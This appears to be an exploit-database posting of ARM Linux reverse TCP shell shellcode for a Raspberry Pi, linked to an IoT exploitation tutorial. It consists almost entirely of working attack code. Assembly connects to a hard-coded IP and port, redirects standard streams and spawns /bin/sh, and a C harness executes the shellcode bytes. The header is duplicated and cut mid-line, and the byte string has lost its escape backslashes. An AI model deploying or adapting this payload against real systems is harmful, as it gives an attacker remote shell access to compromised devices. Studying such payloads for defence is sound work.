Linux ARM Raspberry Pi Reverse TCP Shell Shellcode

/*

##################################
# Andrea Sindoni - @invictus1306 #
##################################

This schellcode is part of my episodes:
- ARM /*

##################################
# Andrea Sindoni - @invictus1306 #
##################################

This schellcode is part of my episodes:
- ARM exploitation for IoT - https://quequero.org/2017/07/arm-exploitation-iot-episode-2/

Enviroment: Raspberry pi 3

Default settings for port:4444 ip:192.168.0.12

.global _start
_start:

mov r1, #0x5C @ r1=0x5c
mov r5, #0x11 @ r5=0x11
mov r1, r1, lsl #24 @ r1=0x5c000000
add r1, r1, r5, lsl #16 @ r1=0x5c110000 - port number=4444(0x115C) -- please change me
add r1, #2 @ r1=0x5c110002 - sin_family+sin_port
ldr r2, =#0x0c00a8c0 @ sin_addr=192.168.0.12 each octet is represented by one byte -- please change me
push {r1, r2} @ push into the stack r1 and r2
mov r1, sp @ save pointer to sockaddr_in struct

mov r2, #0x10 @ addrlen
mov r0, r6 @ mov sockfd into r0
ldr r7, =#283 @ connect syscall
swi 0

@ Redirect stdin, stdout and stderr via dup2
mov r1, #2 @ counter stdin(0), stdout(1) and stderr(2)
loop:
mov r0, r6 @ mov sockfd into r0
mov r7, #63 @ dup2 syscall
swi 0
sub r1, r1, #1 @ decrement counter
cmp r1, #-1 @ compare r1 with -1
bne loop @ if the result is not equal jmp to loop

@ int execve(const char *filename, char *const argv[],char *const envp[]);

mov r0, pc
add r0, #32
sub r2, r2, r2
push {r0, r2}
mov r1, sp
mov r7, #11
swi 0

_exit:
mov r0, #0
mov r7, #1
swi 0 @ exit(0)

shell: .asciz "/bin/sh"


Assemble and link it:
as -o reverse_shell.o reverse_shell.s
ld -o reverse_shell reverse_shell.o
*/

#include <stdio.h>

char *code= "x02x00xa0xe3x01x10xa0xe3x00x20xa0xe3x80x70x9fxe5x00x00x00xefx00x60xa0xe1x5cx10xa0xe3x11x50xa0xe3x01x1cxa0xe1x05x18x81xe0x02x10x81xe2x64x20x9fxe5x06x00x2dxe9x0dx10xa0xe1x10x20xa0xe3x06x00xa0xe1x54x70x9fxe5x00x00x00xefx02x10xa0xe3x06x00xa0xe1x3fx70xa0xe3x00x00x00xefx01x10x41xe2x01x00x71xe3xf9xffxffx1ax0fx00xa0xe1x20x00x80xe2x02x20x42xe0x05x00x2dxe9x0dx10xa0xe1x0bx70xa0xe3x00x00x00xefx00x00xa0xe3x01x70xa0xe3x00x00x00xefx2fx62x69x6ex2fx73x68x00x19x01x00x00xc0xa8x00x0cx1bx01x00x00";

int main(void) {
(*(void(*)()) code)();
return 0;
}